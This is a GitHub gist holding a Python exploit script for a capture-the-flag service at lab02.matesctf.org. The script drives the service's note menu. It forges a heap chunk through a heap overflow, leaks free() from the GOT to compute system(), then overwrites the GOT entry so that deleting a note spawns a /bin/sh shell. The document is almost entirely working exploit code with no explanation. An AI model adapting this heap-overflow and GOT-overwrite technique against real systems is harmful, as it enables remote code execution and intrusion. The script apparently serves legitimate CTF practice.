Skip to content

Instantly share code, notes, and snippets.

@peternguyen93
Created September 27, 2015 05:24
Show Gist options
  • Save peternguyen93/a0e7c78db38ea69d6a27 to your computer and use it in GitHub Desktop.
Save peternguyen93/a0e7c78db38ea69d6a27 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
from Pwn import *
p = Pwn(mode=1,host='lab02.matesctf.org',port=4001)
def add_node(nid,content):
p.read_until('Please choose an option :')
p.write('1\n')
p.read_until('Please give me an id:')
p.write(nid + '\n')
p.read_until('Please give me a size:')
p.write(str(len(content)) + '\n')
p.read_until('Please input your data:')
p.send(content)
p.write('\n')
def edit_node(nid,content):
p.read_until('Please choose an option :')
p.write('3\n')
p.read_until('Please give me an id:')
p.write(nid + '\n')
p.read_until('Please give me a size:')
p.write(str(len(content)) + '\n')
p.send(content)
p.write('\n')
def print_node(nid,size):
p.read_until('Please choose an option :')
p.write('4\n')
p.read_until('Please give me an id:')
p.write(nid + '\n')
p.read_until('Please give me a size:')
p.write(str(size) + '\n')
def delete(nid):
p.read_until('Please choose an option :')
p.write('2\n')
p.read_until('Please give me an id:')
p.write(nid + '\n')
def exploit():
p.connect()
# raw_input('> ')
add_node('1'*15,'A'*16)
add_node('2'*15,'/bin/sh\x00' + 'B'*8)
add_node('3'*15,'C'*16)
add_node('4'*15,'/bin/sh\x00' + 'B'*8)
# print_node('1'*15,80)
# heap_leak = p.recv(80)
# heap_addr = p.up32(heap_leak[52:56])
# print '[+] heap',hex(heap_addr)
fake_chunk = 'A'*16 + p.pack(0) + p.pack(0x31)
fake_chunk+= 'F'*15 + '\x00' + p.p32(0x10) + p.p32(0x602018) # free got
fake_chunk+= p.p32(0) + p.p32(0x41414141)
delete('1'*15)
edit_node('2'*15,fake_chunk) # heap overflow
print_node('F'*15,8) # leak system
leak = p.recv(8)
free_addr = p.unpack(leak)
system_addr = free_addr - p.get_libc_offset(free_addr,'free')
print '[+] free()',hex(free_addr)
print '[+] system()',hex(system_addr)
edit_node('F'*15,p.pack(system_addr)) # overwrite got
delete('4'*15) # trigger system
p.io()
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment